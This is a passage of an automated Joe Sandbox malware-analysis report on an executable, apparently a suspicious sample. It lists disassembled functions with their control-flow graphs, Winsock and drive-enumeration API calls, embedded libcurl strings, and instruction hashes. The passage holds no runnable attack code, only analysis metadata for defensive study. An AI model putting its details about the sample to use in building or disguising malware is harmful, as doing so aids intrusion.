                                                              • Instruction ID: 3e62159a79bd7bedcaf49e85ae949f072a187b66777f604389c2e4cd3d40eba1
                                                              • Opcode Fuzzy Hash: ca810003a93820ffbb870b57acc7c3f858f88404431ee0165ab5aaa2c754b25c
                                                              • Instruction Fuzzy Hash: 0271D4B490431A9FDB50DF69C58479EBBF0BF84308F11886DE898A7351D7749A88CF92
                                                              Function 00E976A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1180 e976a0-e976be 1181 e976c0-e976c7 1180->1181 1182 e976e6-e976f2 send 1180->1182 1181->1182 1185 e976c9-e976d1 1181->1185 1183 e9775e-e97762 1182->1183 1184 e976f4-e97709 call e972a0 1182->1184 1184->1183 1187 e9770b-e97759 call e972a0 call e9cb20 call 1218c50 1185->1187 1188 e976d3-e976e4 1185->1188 1187->1183 1188->1184
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00EA07BF), ref: 00E976EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-2907172669
                                                              • Opcode ID: daa6984b7112ced0268c7a17cb20c9c8eb41c20533a42ce1da0407bcee0f1fc5
                                                              • Instruction ID: 2c33e9d71f5f72b2b8ec9ce964e56de7af609397a4334eabd0ccb94dc5002529
                                                              • Opcode Fuzzy Hash: daa6984b7112ced0268c7a17cb20c9c8eb41c20533a42ce1da0407bcee0f1fc5
                                                              • Instruction Fuzzy Hash: FB115BB5628304BBD631971A9C85D273B9CDF82B78F551929F85937252E1719C0C82F1
                                                              Function 00EC9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1299 ec9290-ec92ed call e976a0 1302 ec93c3-ec93ce 1299->1302 1303 ec92f3-ec92fb 1299->1303 1310 ec93e5-ec9427 call ead090 call ed4f40 1302->1310 1311 ec93d0-ec93e1 1302->1311 1304 ec93aa-ec93af 1303->1304 1305 ec9301-ec9333 call ead8c0 call ead9a0 1303->1305 1308 ec93b5-ec93bc 1304->1308 1309 ec9456-ec9470 1304->1309 1323 ec9335-ec9364 WSAIoctl 1305->1323 1324 ec93a7 1305->1324 1313 ec93be 1308->1313 1314 ec9429-ec9431 1308->1314 1310->1309 1310->1314 1311->1308 1315 ec93e3 1311->1315 1313->1309 1318 ec9439-ec943f 1314->1318 1319 ec9433-ec9437 1314->1319 1315->1309 1318->1309 1322 ec9441-ec9453 call ed50a0 1318->1322 1319->1309 1319->1318 1322->1309 1327 ec939b-ec93a4 1323->1327 1328 ec9366-ec936f 1323->1328 1324->1304 1327->1324 1328->1327 1331 ec9371-ec9390 setsockopt 1328->1331 1331->1327 1332 ec9392-ec9395 1331->1332 1332->1327
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00EC935C
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00EC9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 84adb52420901f65b58ef030b9814d1ad4320eb965dc4d6619734932e0ad7100
                                                              • Instruction ID: dfb6b483071974cf09d4c3753fabae880d6dc9157bf295af80ffa7fb1b20dc50
                                                              • Opcode Fuzzy Hash: 84adb52420901f65b58ef030b9814d1ad4320eb965dc4d6619734932e0ad7100
                                                              • Instruction Fuzzy Hash: B1513530600305ABE714DF28C985FAAB7A5FF88318F14952DFD58AB283E731E952C751
                                                              Function 0121D1D0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1333 121d1d0-121d281 call 1218d18 1336 121d3b7-121d3c1 1333->1336 1337 121d287-121d28e 1333->1337 1338 121d2da-121d2dd 1337->1338 1339 121d290-121d2a1 1338->1339 1340 121d2df-121d305 1338->1340 1341 121d2a3-121d2aa 1339->1341 1342 121d2ac-121d2b6 1339->1342 1343 121d3b0 1340->1343 1344 121d30b-121d324 1340->1344 1341->1342 1345 121d2bf-121d2c2 1341->1345 1346 121d340-121d347 call 1218c68 1342->1346 1347 121d2bc 1342->1347 1343->1336 1348 121d326-121d332 1344->1348 1349 121d2c9-121d2d4 1345->1349 1366 121d34c 1346->1366 1347->1345 1350 121d334-121d337 1348->1350 1351 121d358-121d35d 1348->1351 1349->1338 1349->1343 1350->1346 1350->1351 1353 121d620-121d62a 1350->1353 1354 121d700-121d735 call 121b6a0 1350->1354 1355 121d602-121d604 1350->1355 1356 121d4e4-121d4f7 call 121b640 1350->1356 1357 121d4c6-121d4c8 1350->1357 1358 121d6a6-121d6af 1350->1358 1359 121d5e9-121d5ec 1350->1359 1360 121d4ab-121d4ad 1350->1360 1361 121d5cb-121d5cd 1350->1361 1362 121d5ad-121d5af 1350->1362 1363 121d570-121d576 1350->1363 1364 121d6d3-121d6dc 1350->1364 1365 121d4fc-121d4fe 1350->1365 1367 121d363-121d366 1351->1367 1368 121daeb-121db00 call 121b640 1351->1368 1371 121d630-121d643 1353->1371 1372 121d8d2-121d8e7 1353->1372 1354->1349 1369 121dad1-121dad4 1355->1369 1370 121d60a-121d61b 1355->1370 1356->1349 1374 121d3a0-121d3a4 1357->1374 1376 121d4ce-121d4df 1357->1376 1377 121d6b5-121d6ce call 121c9c0 1358->1377 1378 121da4c-121da65 call 121c9c0 1358->1378 1384 121d5f2-121d5fd 1359->1384 1388 121dbbc-121dbdd 1359->1388 1360->1374 1375 121d4b3-121d4c1 1360->1375 1361->1374 1387 121d5d3-121d5e4 1361->1387 1362->1374 1386 121d5b5-121d5c6 1362->1386 1363->1384 1385 121d578-121d57e 1363->1385 1380 121d6e2-121d6fb call 121ca50 1364->1380 1381 121d9de-121d9ee call 121ca50 1364->1381 1365->1374 1382 121d504-121d54f localeconv call 12278b0 1365->1382 1366->1345 1367->1368 1389 121d36c-121d36e 1367->1389 1368->1349 1369->1368 1396 121dad6 1369->1396 1392 121d3a6-121d3a8 1370->1392 1394 121d649-121d657 1371->1394 1395 121db9c-121db9e 1371->1395 1403 121dba0-121dba2 1372->1403 1404 121d8ed-121d8fd 1372->1404 1374->1392 1375->1392 1376->1392 1377->1349 1378->1349 1380->1349 1408 121d9f3-121d9f7 1381->1408 1428 121d551-121d556 1382->1428 1429 121d55e-121d56b 1382->1429 1384->1392 1405 121db05-121db18 1385->1405 1406 121d584-121d592 1385->1406 1386->1392 1387->1392 1388->1392 1390 121d374-121d37f 1389->1390 1391 121dadb-121dae6 1389->1391 1390->1374 1409 121d381-121d389 1390->1409 1392->1348 1413 121d3ae 1392->1413 1411 121d663-121d670 1394->1411 1412 121d659-121d65c 1394->1412 1416 121dba4-121dbb7 call 121b9d0 1395->1416 1396->1391 1403->1416 1418 121d909-121d918 1404->1418 1419 121d8ff-121d902 1404->1419 1405->1392 1420 121dcd8-121dcda 1406->1420 1421 121d598-121d5a8 1406->1421 1408->1349 1424 121db8c-121db97 1409->1424 1425 121d38f-121d39c 1409->1425 1426 121d676-121d687 1411->1426 1427 121dcb9-121dcd3 call 121b9d0 1411->1427 1412->1411 1413->1343 1431 121dc9a-121dcb4 call 121b9d0 1418->1431 1432 121d91e-121d92f 1418->1432 1419->1418 1422 121dcf3-121dd13 1420->1422 1423 121dcdc-121dce7 1420->1423 1421->1392 1422->1392 1423->1422 1424->1392 1425->1374 1433 121db1d-121db26 1426->1433 1434 121d68d-121d6a1 call 121cc90 1426->1434 1427->1408 1428->1429 1429->1392 1431->1427 1437 121dc81-121dc8a 1432->1437 1438 121d935-121d93a 1432->1438 1443 121db5c-121db5f 1433->1443 1434->1408 1437->1431 1442 121d940-121d97a call 121cc90 1438->1442 1438->1443 1442->1408 1443->1437 1446 121db65 1443->1446 1446->1424
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$Inf$NaN
                                                              • API String ID: 0-141429178
                                                              • Opcode ID: 6a5e243a8ada1d3025f001aa790135e69dfc0f3ee51a9e4c6fba60c86f00b3fc
                                                              • Instruction ID: fec0192c8d2a4378a31f60bc057d0e5f18af98009cd46245330f97f0267b3d5d
                                                              • Opcode Fuzzy Hash: 6a5e243a8ada1d3025f001aa790135e69dfc0f3ee51a9e4c6fba60c86f00b3fc
                                                              • Instruction Fuzzy Hash: 59F1D23162C38ACBD721DF68C0847ABBBE2BB95314F048A1DD9DD87389D7759905CB82
                                                              Function 00E975E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1468 e975e0-e975ed 1469 e975ef-e975f6 1468->1469 1470 e97607-e97629 socket 1468->1470 1469->1470 1471 e975f8-e975ff 1469->1471 1472 e9762b-e9763c call e972a0 1470->1472 1473 e9763f-e97642 1470->1473 1474 e97601-e97602 1471->1474 1475 e97643-e97699 call e972a0 call e9cb20 call 1218c50 1471->1475 1472->1473 1474->1470
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 9f732535a58035a975b3c5ae8801feecd302bbb4d9a9ecdd54de4f2c7a4b1592
                                                              • Instruction ID: cc44b9bce3343f7f222e3885894aa757b076c0b291a5c86eaa667614dd393939
                                                              • Opcode Fuzzy Hash: 9f732535a58035a975b3c5ae8801feecd302bbb4d9a9ecdd54de4f2c7a4b1592
                                                              • Instruction Fuzzy Hash: 4A1159B1A2421077EB315A2EAC06E5B3F88DF91B34F551925F864A72E2D2318C5C93D1
                                                              Function 00ECA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1757 eca150-eca159 1758 eca15f-eca17b 1757->1758 1759 eca250 1757->1759 1760 eca249-eca24f 1758->1760 1761 eca181-eca1ce getsockname 1758->1761 1760->1759 1762 eca1f7-eca214 call ecef30 1761->1762 1763 eca1d0-eca1f5 call ead090 1761->1763 1762->1760 1768 eca216-eca23b call ead090 1762->1768 1771 eca240-eca246 call ed4f40 1763->1771 1768->1771 1771->1760
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00ECA1C7
                                                              Strings
                                                              • getsockname() failed with errno %d: %s, xrefs: 00ECA1F0
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00ECA23B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: f11024f979621d57eccce3999964b822ad1f749847a12250c984bc9c15632f3f
                                                              • Instruction ID: 1a9900dcd74ab33a60fdf8664d5c6bb74f285771baaaa4f2e46662edf3941d9d
                                                              • Opcode Fuzzy Hash: f11024f979621d57eccce3999964b822ad1f749847a12250c984bc9c15632f3f
                                                              • Instruction Fuzzy Hash: 10210C71908284BAF7259758DC42FE773BCEF91328F041618F99863151FB33698687E2
                                                              Function 00EAD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 00EAD65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 4acf6e230b3475b81dddfc9838235f086b8ce4574b39f5d65555d89f1fa4cf27
                                                              • Instruction ID: 191e494dd88b76ec3b3122809cecdf8e42a95285b082a16a31570dffee41f427
                                                              • Opcode Fuzzy Hash: 4acf6e230b3475b81dddfc9838235f086b8ce4574b39f5d65555d89f1fa4cf27
                                                              • Instruction Fuzzy Hash: CE01FCE094834157E7616B7CAC1B36625D06B97308F491868D89DAB196F72DC58CC293
                                                              Function 00F5AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00F5AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00F5ABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: f5b1113a7ed1008f69401171f8da5de36f96e1d5e79bdce9f296bae1060c5055
                                                              • Instruction ID: 392bebd841995a9a7f526ad5bb1cae1da0b6d9ab991d74a8fa21fca3448fa678
                                                              • Opcode Fuzzy Hash: f5b1113a7ed1008f69401171f8da5de36f96e1d5e79bdce9f296bae1060c5055
                                                              • Instruction Fuzzy Hash: BAE1E270A043019BEB20CF15C845B6A77E1FF85321F044A2CFE999B291E775D968EB93
                                                              Function 07130008 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 2538213e72b71501e87977045eb26fcf61fd0c43143ff404397fdd87f92db1b8
                                                              • Instruction ID: 21aed41b50f7839c2c7b3322c160e7f4f955625b1b2123336d338d572e334c12
                                                              • Opcode Fuzzy Hash: 2538213e72b71501e87977045eb26fcf61fd0c43143ff404397fdd87f92db1b8
                                                              • Instruction Fuzzy Hash: 8C5194EB26C121BD714AC0851B54EFB5AEFE5CF770F328426B40BD6682E7988E891171
                                                              Function 07130000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a1227811d5468a365d5b54c3f2e27362f60524d2c5c6ba3e993e6388423a4e20
                                                              • Instruction ID: 0fbd59c92478e84b7de28a0a440dc9dc961b7e6b932393e700f20fb5b366666f
                                                              • Opcode Fuzzy Hash: a1227811d5468a365d5b54c3f2e27362f60524d2c5c6ba3e993e6388423a4e20
                                                              • Instruction Fuzzy Hash: 0E5185EB26C121BD714AC0851B54EFB5AEFE5CF770F338426B40BD6682E7988E4A1171
                                                              Function 07130028 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
